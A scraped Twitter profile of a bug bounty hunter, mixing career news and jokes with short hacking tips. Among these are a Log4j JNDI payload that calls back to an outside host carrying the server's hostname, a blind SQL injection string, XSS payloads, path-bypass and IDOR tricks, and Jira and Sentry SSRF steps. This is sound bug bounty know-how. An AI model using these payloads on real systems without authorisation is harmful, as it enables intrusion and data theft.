Patrik Fehrenbach @ITSecurityguard Twitter profile

Pinned Tweet

Patrik Fehrenbach

11 months

Just launched a community discord for Practical Bug Bounty 👇 and a website: and a Repository with content: (not in sync) For anyone who wants to contribute to code, ideas, or content feel free to join ♥️

5

38

183

Last Seen Profiles

@g00ax

@selenasuh__

@WACofficiel

@bokeplokalmalam

@editor_kashif

@7lilbj

@tachiharam55421

@gaystargirlco

@BrandonHileman5

@eddyburback

@lovely_swap

@Sebastianlavoix

@Hikali_jp

@PraveenKum59237

@Cd990706

@GulfstreamPark

@octoopus35

@svarog714

@denzil627

@BloisFootball41

@harryfossils

@yuna32m3

@MathsCircleLtd

@WashUESE

@GdR_UP

@lexigreen_20

@We11y_

@TheKidGravity

@MyNBC5

@MEITO_Aka

@Raci13211631

@EvaristoLPR

@oo40595136

@IrisNi18

@Sera_kemo

@fuxkdatb

Patrik Fehrenbach

@ITSecurityguard

2 years

This is your yearly reminder that ALL Udemy Bug Bounty courses are a waste of money. The content you need is out there, completely for free. Don't believe me? Here is a list of the best Bug Bounty Ressources out there 🧵👇 #bugbountytips #BugBounty

105

540

2K

Patrik Fehrenbach

@ITSecurityguard

2 years

@samwcyo @Google Hello, this is Patrik from the Google. I sent u the wire information in DM, please return ASAP.

21

6

1K

Patrik Fehrenbach

@ITSecurityguard

4 years

I compiled a mind-map of all the tools I use for my day to day Bug Bounty journey :) Please let me know if you find his helpful 👐 🥰🔐 full resolution of the image here:

22

385

1K

Patrik Fehrenbach

@ITSecurityguard

1 year

SQLI on Google (: Flow: I found an old subdomain. I discovered the parameter "q" and injected the classic payload '. After obtaining the injected result, I initiated the exploitation. #bugbounty #bugbountytips

80

118

1K

Patrik Fehrenbach

@ITSecurityguard

4 years

🥳 New Blogpost! 🥳 How I made more than $30K with Jolokia CVEs Big Thanks to @yaworsk @damian_89_ @un4gii @jstnkndy

15

350

966

Patrik Fehrenbach

@ITSecurityguard

3 years

Here are some ideas for potential attack surfaces for Log4J: in your robots.txt 😏 in your dns records (txt...) in your email headers in your usernames in your passwords in your headers in your e-mail addresses in your files in your SSL Certificates in your EXIF #log4j

14

222

890

Patrik Fehrenbach

@ITSecurityguard

5 years

Since absolutely nobody asked for it: I am creating a Youtube channel for tutorials on Android/iOS/ and Bug Bounties in general! (may need to change the intro though) sorry @LiveOverflow @NahamSec If you have any topics I should cover, let me know :)

21

137

800

Patrik Fehrenbach

@ITSecurityguard

4 years

I just uploaded some of the most common file types for my Patrik's Bug Bounty Tools mind map here: SVG: PDF: XMIND: PNG: enjoy! 🥰🥳👑 #bugbountytips #BugBounty

10

287

756

Patrik Fehrenbach

@ITSecurityguard

5 years

dear Bug Bounty world: DON'T spend money on ANY paid courses/mentors you'll find online, the information shared there is already public. Learn how to use Google and most importantly learn how to apply your knowledge. THERE ARE NO SECRETS FOR SALE 👈 #bugbounty #bugbountytip

31

143

743

Patrik Fehrenbach

@ITSecurityguard

6 years

I recently scored a 4000$ bounty by using visual recon :-) here's a guide on how to do it: Visual Recon – A beginners guide: … enjoy!

11

271

700

Patrik Fehrenbach

@ITSecurityguard

3 years

Want to make easy money online? 1. Copy + Paste 2. Make Udemy Course 3. $$$

34

82

685

Patrik Fehrenbach

@ITSecurityguard

3 years

#bugbountytip #bugbounty #pii #critical #bugbountytips GET /api/users/1 (where I'm user 1) -> HTTP 200 GET /api/users/;/2 -> HTTP 100 GET /api/users/;;/2 -> HTTP 200 GET /api/users/;;;/2 -> HTTP 300 GET /api/users/;;;;/2 -> HTTP 400 GET /api/users/;;;;;/2 -> HTTP 500

27

199

680

Patrik Fehrenbach

@ITSecurityguard

3 years

trying to test every header of a website for #log4j ? Use BurpSuite and the Pitchfork attack in the Intruder and set both payloads to the header values: ${jndi:ldap://${hostName}.§§.${sys:java.version}.cb.io} now you know the vuln header :) #bugbounty #bugbountytips

10

211

662

Patrik Fehrenbach

@ITSecurityguard

2 years

Play games, do CTFs, code, go outside and enjoy the weather, listen to music, cook, read, ANYTHING But please don't hack billion dollar companies for absolutely nothing. #nomorefreebugs #bugbountytip #bugbountytips (1)

25

110

630

Patrik Fehrenbach

@ITSecurityguard

4 years

18

141

622

Patrik Fehrenbach

@ITSecurityguard

4 years

22

162

579

Patrik Fehrenbach

@ITSecurityguard

2 years

I found an API that would take an ID parameter as input to show the User details, so obviously I have tried to change it to a different ID - didn't work. What did work though: id=-1 17MB JSON response, someone will have a fun week ahead. #BugBounty #bugbountytips

14

78

567

Patrik Fehrenbach

@ITSecurityguard

5 years

Sentry Blind SSRF ( /) 1. cat aquatone/*/urls.txt | grep sentry 2. Burpsuite 3. Send it to Repeater 4. Change the value of filename: to a url (or similar) 5. Wait for a connection 6. 👻

10

236

535

Patrik Fehrenbach

@ITSecurityguard

4 years

Massive shoutout to for creating it is exactly what most of you people are looking for 😍 #recon #bugbountytips #BugBounty #AutomationAnywhere

GitHub - yogeshojha/rengine: reNgine is an automated reconnaissance framework for web applications...

reNgine is an automated reconnaissance framework for web applications with a focus on highly configurable streamlined recon process via Engines, recon data correlation and organization, continuous ...

github.com

9

166

476

Patrik Fehrenbach

@ITSecurityguard

11 months

After the whole paid courses drama yesterday I started to code a bit and came up with an idea: A free (😯) website with curated content from the bug bounty community for the bug bounty community. Course Style, beginner friendly, all in one place :) TBM (The BB Mentor) 👇

18

69

473

Patrik Fehrenbach

@ITSecurityguard

3 years

Some personal news: I'll be joining @Shopify @ShopifyEng as a Security Engineer starting January 2022 :-)

60

3

464

Patrik Fehrenbach

@ITSecurityguard

1 year

I just found an unbelievable number of unauthorized API endpoints using this 1 liner. katana -u $url -hl -nos -jc -silent -aff -kf all,robotstxt,sitemapxml -c 150 -fs fqdn |subjs | python3 /opt/JSA/jsa.py |goverview probe -N -c 500 |sort -u -t';' -k2,14 |cut -d ';' -f1

24

110

450

Patrik Fehrenbach

@ITSecurityguard

3 years

Built a Raspberry Pi K3S Cluster Today! 🥰 (Club Mate bottle for scale)

18

21

450

Patrik Fehrenbach

@ITSecurityguard

5 years

Google Template Injection: Status: Unfixed

33

68

422

Patrik Fehrenbach

@ITSecurityguard

3 years

My highest paid bugs were the easiest ones to find 🤷‍♂️ Remember: Good bugs don't need to contain a complex exploit chain, sometimes a simple misconfiguration is enough :-) impact =! complexity

5

27

410

Patrik Fehrenbach

@ITSecurityguard

3 years

Today I took probably the hardest decision of my life so far. After almost 7 years I have resigned from my position at @Hacker0x01 🥺 Thanks to everyone who was part of the journey, it was an amazing time. I will remain in the Bug Bounty Space 😏 To new challenges! 🍾

57

2

411

Patrik Fehrenbach

@ITSecurityguard

4 years

I am using the following Data sources in Amass: wonderful guide by @hahwul how to set up the API keys:

5

139

405

Patrik Fehrenbach

@ITSecurityguard

3 years

Holy! @andirrahmani1 and myself just scored a 45.000$ 😱😱😱😱😱 Bounty on @Hacker0x01 Thats a new personal record 🎉🎉🎉 Teamwork makes the dream work! #togetherwehitharder

29

9

395

Patrik Fehrenbach

@ITSecurityguard

4 years

There are exactly 2 people who should know how much you made in bounties in 2020: 1.) Yourself 2.) The Tax Office

13

19

363

Patrik Fehrenbach

@ITSecurityguard

2 years

Are you looking for a challenge and want to earn some life-changing money? We've just increased our rewards for high and critical submissions to $50,000 for high and $100,000 for critical issues 😏 let the games begin 🦾 💰

Shopify - Bug Bounty Program | HackerOne

The Shopify Bug Bounty Program enlists the help of the hacker community at HackerOne to make Shopify more secure. HackerOne is the #1 hacker-powered security platform, helping organizations find and...

hackerone.com

11

48

358

Patrik Fehrenbach

@ITSecurityguard

3 years

Fantastic work by @rootxharsh & @iamnoooob RCE on Apple using a 0day in Lucee for a 50k$ Bounty!

3

109

357

Patrik Fehrenbach

@ITSecurityguard

3 years

The moment you stop the Udemy Videos and open Burpsuite, is when you start making money. 🙃 #bugbountytips #BugBounty

11

26

344

Patrik Fehrenbach

@ITSecurityguard

4 years

The rewards in Bug Bounties shouldn't be your primary motivation to hunt... do it for the knowledge, the fun, the adrenaline. The money will come one day :) (promise)

18

43

335

Patrik Fehrenbach

@ITSecurityguard

4 years

mood.jpg

17

33

333

Patrik Fehrenbach

@ITSecurityguard

2 years

5

63

319

Patrik Fehrenbach

@ITSecurityguard

10 months

Just released an extension for Burpsuite that allows you to quickly extract the links to Javascript files of a website from the Burpsuite Site map: #BugBounty #Pentesting #bugbountytip #bugbountytips demo 👇

6

69

328

Patrik Fehrenbach

@ITSecurityguard

7 years

Dear upcoming mobile hackers, I wrote a blogpost about bypassing Android Certificate Pinning with Frida: enjoy :-)

11

170

320

Patrik Fehrenbach

@ITSecurityguard

1 year

I asked ChatGPT to write a HackerOne Report like the hacking gods from the 90's would, was not disappointed.

9

37

318

Patrik Fehrenbach

@ITSecurityguard

5 years

If you start your Bug Bounty journey with excuses, it wont work. - every bug bounty program has issues to find, public or private - Burp is amazing, Pro or Community - Bazillion Tutorials are out there, read them success is the result of hard work, you won't get it for free

4

70

311

Patrik Fehrenbach

@ITSecurityguard

4 years

Yay, I was awarded a $5,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder Thank you so much @umr4n6 for the amazing bypass :] /..;/..;/ can only recommend following her :) Vogel #dreamworkmakestheteamwork

HackerOne profile - patrik

- http://www.it-securityguard.com

hackerone.com

6

48

303

Patrik Fehrenbach

@ITSecurityguard

3 years

5

23

296

Patrik Fehrenbach

@ITSecurityguard

3 years

If you are intercepting a locally installed application with Burspuite and it doesn't pick up the traffic: In Firefox go to about:config and change network.proxy.allow_hijacking_localhost to true 🤗🐧 #BugBounty #bugbountytip #bugbountytips

11

84

290

Patrik Fehrenbach

@ITSecurityguard

3 years

If you struggle with setting up RogueJDNI to exploit the recent log4j vulnerability: I have written a tutorial as part of () Good Luck! 🍀

4

78

290

Patrik Fehrenbach

@ITSecurityguard

4 years

For those who are wondering if you make money by creating educational content for free: My website - with 378940 unique visitors generated 40,82€ in ad revenue within the last ~5 years. Beers on me! ;-)

14

18

291

Patrik Fehrenbach

@ITSecurityguard

3 years

Bug Bounty is cool and all, but when was the last time you went hiking?

24

4

277

Patrik Fehrenbach

@ITSecurityguard

4 years

Hey #h12010 , I am not allowed to participate, but I'd do the Recon with Amass: amass enum -d -dir -ip -config /root/config.ini The config file (without creds) So far: 12197 IPs, 11775 Domains 🥰

Amass Config

GitHub Gist: instantly share code, notes, and snippets.

gist.github.com

5

66

277

Patrik Fehrenbach

@ITSecurityguard

4 years

Don't drop out of college because of infosec/bug bounty #bugbountytips #bugbounty #ittakesadegree #togetherwestudyharder

19

30

273

Patrik Fehrenbach

@ITSecurityguard

2 years

I AM THE #1 USA HACKER

17

15

273

Patrik Fehrenbach

@ITSecurityguard

3 years

#BugBounty

14

17

262

Patrik Fehrenbach

@ITSecurityguard

3 years

If you remember this, you had a good youth ❣️

13

42

260

Patrik Fehrenbach

@ITSecurityguard

3 years

Slides for my "Amassive Leap in Host Discovery" at this years #NahamCon2021 the Github Repo: 👁️

GitHub - PatrikFehrenbach/amass-tools

Contribute to PatrikFehrenbach/amass-tools development by creating an account on GitHub.

github.com

8

82

262

Patrik Fehrenbach

@ITSecurityguard

5 years

Work from home ❤️

8

263

Patrik Fehrenbach

@ITSecurityguard

4 years

1 Million Reports submitted to @Hacker0x01 🤗 what an amazing milestone :). My very first Report was #20148 (N/A) to Verizon Media on July 15, 2014 - whats yours? #togetherwehitharder

49

11

256

Patrik Fehrenbach

@ITSecurityguard

4 years

My blog was down for a couple of days, some idiot bruteforced /wp-login.php with over 120.000 requests. Bro, if you want an account for my blog - just ask

23

8

258

Patrik Fehrenbach

@ITSecurityguard

4 years

I don’t hack boxes, I do real hacking. It’s called VIM.

10

7

256

Patrik Fehrenbach

@ITSecurityguard

4 years

i am dying

8

54

258

Patrik Fehrenbach

@ITSecurityguard

3 years

Starting today you can chose which Triage Analyst you want on your Report on @Hacker0x01 !

27

10

249

Patrik Fehrenbach

@ITSecurityguard

3 years

Test

10

18

246

Patrik Fehrenbach

@ITSecurityguard

4 years

5

32

248

Patrik Fehrenbach

@ITSecurityguard

3 years

I am a Security Expert so I hereby recommend input validation of every form. 💯

9

13

242

Patrik Fehrenbach

@ITSecurityguard

4 years

Automatic discovery + exfiltration of /.git/ repositories four very easy P1s delivered right in your Slack :) curl -X POST -H 'Content-type: application/json' --data '{"text":"Hello, World!"}' YOUR_WEBHOOK_URL 👩‍🌾❤️

3

77

245

Patrik Fehrenbach

@ITSecurityguard

3 years

We are hiring U.S. 🇺🇸 Security Analysts for the Triage Team at @Hacker0x01 ! 100% remote DM me if you have any questions Submit your Application on the link below 👇 #infosec #bugbountytips #infosecjobs RT would be appreciated ♻️❤️

5

105

242

Patrik Fehrenbach

@ITSecurityguard

3 years

best wordlist for content discovery out there?

28

31

238

Patrik Fehrenbach

@ITSecurityguard

3 years

Pre-Auth RCE in Moodle using Shibboleth () Nice one 😊 my university uses that as well 😉

Pre-Auth RCE in Moodle Part I - PHP Object Injection in Shibboleth Module

It was found that the Shibboleth authentication module of Moodle suffers from a beautiful Remote Code Execution vulnerability from the unauthenticated perspective. This is widely used among univers...

haxolot.com

5

70

240

Patrik Fehrenbach

@ITSecurityguard

3 years

Just crossed 1000 Vulnerability Reports in ~9 Years of Bug Hunting 🤭 Around ~87% were valid, non duplicates 8 % Dupe 5 % Informative / Not Applicable Highest Reward = 50.000 USD Lowest Reward = 25€ 98% of the Programs were Bug Bounties, 2% VDPs #bugbounty

25

2

237

Patrik Fehrenbach

@ITSecurityguard

3 years

I found two more!!! #XSs #payloads 1. stop:alert() 2. posting:alert() 3. nonesense:alert() 4. bugbountytips:alert() 5. please:alert() 6. thank:alert() 7. you:alert() 8. bro:alert() #bugbountytips

21

51

233

Patrik Fehrenbach

@ITSecurityguard

8 months

Steps to gain your first CRITICAL CVE: 1. Do your absolute worst in PHP and upload it to 2. Look for mysqli_query 3. Request CVE 4. Profit. 🤡 #pentesting #BugBounty #infosecurity

8

35

238

Patrik Fehrenbach

@ITSecurityguard

4 years

Enumeration of 789 root domains (passive + active discovery) using @owaspamass - this tool is a beast! took 10 minutes :)

13

40

231

Patrik Fehrenbach

@ITSecurityguard

5 years

For BugBounty purposes: Jira SSRF via REST API (CVE-2019-8451) cat aquatone/*/* | grep jira curl grep evil 🦹‍♀️🧙‍♀️ If you are making $$$ out of this information, always remember whom you have to thank for that -> @chybeta 🙏

chybeta

@chybeta

5 years

CVE-2019-8451 Unauthorized SSRF via REST API /plugins/servlet/gadgets/makeRequest use @ to bypass the whitelisting ! 👇 reading resources @orange_8361

1

339

647

3

82

225

Patrik Fehrenbach

@ITSecurityguard

2 years

🧨 of the week (CW 12 / 2022) Remote Command Execution due to publicly accessible Jenkins Bounty: $3000 #bugbountytip #bugbountytipps

4

23

231

Patrik Fehrenbach

@ITSecurityguard

2 years

I admire everyone that is able to do Bug Bounty full time. I try to find 1-2 critical bugs a weeks but it is insanely hard to maintain. 👊 mad respect for that

11

9

225

Patrik Fehrenbach

@ITSecurityguard

2 years

🧨💥 of the week (CW 13 / 2022) Exposed SQL Backup file ( 🇩🇪 for database 😉) Bounty: $5000 SQL Injection blind time based (' waitfor delay'0:0:20'--) Bounty $1500 TIL: Adjust your scanning for the country/language your target is using. #BugBounty

5

37

226

Patrik Fehrenbach

@ITSecurityguard

13 days

I am incredibly happy to have skipped Defcon and Blackhat to marry the love of my life ❤️ Thanks to @smiegles @lucio_89 and Melvin for travelling all the way to Germany to spend the day with us ❤️

50

0

230

Patrik Fehrenbach

@ITSecurityguard

3 years

*gets invited to a program with a shared environment* *clicks on registration* *20 XSS pop ups* *closes window* *leaves program* #BugBounty

6

10

217

Patrik Fehrenbach

@ITSecurityguard

2 years

Do you want to create a wordlist for yourself? Not sure where to start? Not sure what others are doing? Go to any public program and find a /metrics endpoint accessible, extract the paths, profit #BugBounty #bugbountytip #bugbountytips

10

48

219

Patrik Fehrenbach

@ITSecurityguard

4 years

I had hundred's of DMs because of my 10k Tweet again. All I can really tell you is to throw away all of your automation, tooling, recon scripts and get hands on (!) the target. Admittedly not as convenient then waiting for results, but way more rewarding and entertaining. 🙏

7

10

216

Patrik Fehrenbach

@ITSecurityguard

4 years

Happy to announce that I will be presenting at #NahamCon2021 For all you recon hungry people - "Amassive leap in host discovery" :) stay tuned!

3

16

211

Patrik Fehrenbach

@ITSecurityguard

7 months

Self-hosted Bug Bounty Box: - XSSHunter by @rs_loves_bugs - Portainer - Adguard - Nextcloud - Nginx - Docker Registry - Unifi Controller - 3x MariaDB - 3x Wordpress blogs - 5x Mail Boxes with poste - PostgreSQL - Gitlab CE - Home Assistant - Home Bridge

11

10

216

Patrik Fehrenbach

@ITSecurityguard

3 years

Bug bounties are CTFs on easy mode #SorryNotSorry

12

16

212

Patrik Fehrenbach

@ITSecurityguard

3 years

Yay, I was awarded a $12,100 bounty on @Hacker0x01 ! 1 Minor Auth Bypass (1,5k) 2 Misconfigurations (2x5k) 3 Reflected XSS (3x200) 🍀 #TogetherWeHitHarder

HackerOne profile - patrik

- http://www.it-securityguard.com

hackerone.com

9

3

207

Patrik Fehrenbach

@ITSecurityguard

4 years

Yay, I was awarded a $10,000 bounty on @Hacker0x01 ! #TogetherWeHitHarder Usually I don’t yay but this time, I had to Merry Christmas 🎁🎄

HackerOne profile - patrik

- http://www.it-securityguard.com

hackerone.com

9

3

204

Patrik Fehrenbach

@ITSecurityguard

11 months

Just pushed a couple of features to #practicalbugbounty 1. Resources with ~300 tools + 170 Articles 2. Challenges with some free and paid CTF Platforms 3. Night Mode 4. Topic search ... Lots of content still missing but we're getting there :)

5

54

204

Patrik Fehrenbach

@ITSecurityguard

6 years

LinkedIn: Linux Kernel maintainer

3

31

208

Patrik Fehrenbach

@ITSecurityguard

3 years

When I turned 30 earlier this year, I made a list of things that I want to achieve in my 30's one of them was buying my own place. And today I finally did it! :-) Thank you @Hacker0x01 @Bugcrowd @zerocopter @intigriti for allowing me to make this happen ❤️

27

3

205

Patrik Fehrenbach

@ITSecurityguard

3 years

1

34

205

Patrik Fehrenbach

@ITSecurityguard

4 years

If you are looking for ransom, I can tell you I don't have money. But what I do have are a very particular set of skills; skills I have acquired over a very long career. Skills that make me a nightmare for people like you. If you let my xmlrpc.php go, that'll be the end of it.

15

13

196

Patrik Fehrenbach

@ITSecurityguard

7 years

This is one of the best Jailbreaking (published) research i've seen so far by @coalfirelabs

1

96

190

Patrik Fehrenbach

@ITSecurityguard

3 years

5

28

195

Patrik Fehrenbach

@ITSecurityguard

8 years

Decoding a $😱,000.00 htpasswd bounty :-) new Blogpost!

12

84

196

Patrik Fehrenbach

@ITSecurityguard

4 years

Writing a new blogpost: "How I made more than 1 Million USD $$$ by asking Bug Bounty people on Twitter for Secrets and Payloads" stay tuned!

9

18

193

Patrik Fehrenbach

@ITSecurityguard

4 years

I just uploaded some scripts I am using to extend Amass: just specify the directory in your amass config: scripts_directory =/root/tools/scripts/ if you have any tool to add just let me know :) #SharingIsCaring #bugbountytips #bugbountytip

GitHub - PatrikFehrenbach/amass-tools

Contribute to PatrikFehrenbach/amass-tools development by creating an account on GitHub.

github.com

1

75

189

Patrik Fehrenbach

@ITSecurityguard

2 months

My 3-step guide for successful bug bounty hunting: 1️⃣ Write an ASM (Attack Surface Management) tool 🛠️ 2️⃣ Run it 🏃‍♂️💨 3️⃣ Report everything! 📝✅ follow me for more tips

10

6

192

Patrik Fehrenbach

@ITSecurityguard

7 years

I am very proud to announce that I'll be joining @Hacker0x01 as a full time employee starting 1.1.2018. tl;dr patrik + hackerone = 🖖 this account will stay a personal one, and there will be new blogposts soon :-) Happy Holidays <3 #togetherwehitharder #bugbountygoals

34

3

188

Patrik Fehrenbach

@ITSecurityguard

6 years

Hunters, If you want to see which of your subdomains has a webserver running, simply use the amazing httprobe by @TomNomNom cat subdomains.txt | httprobe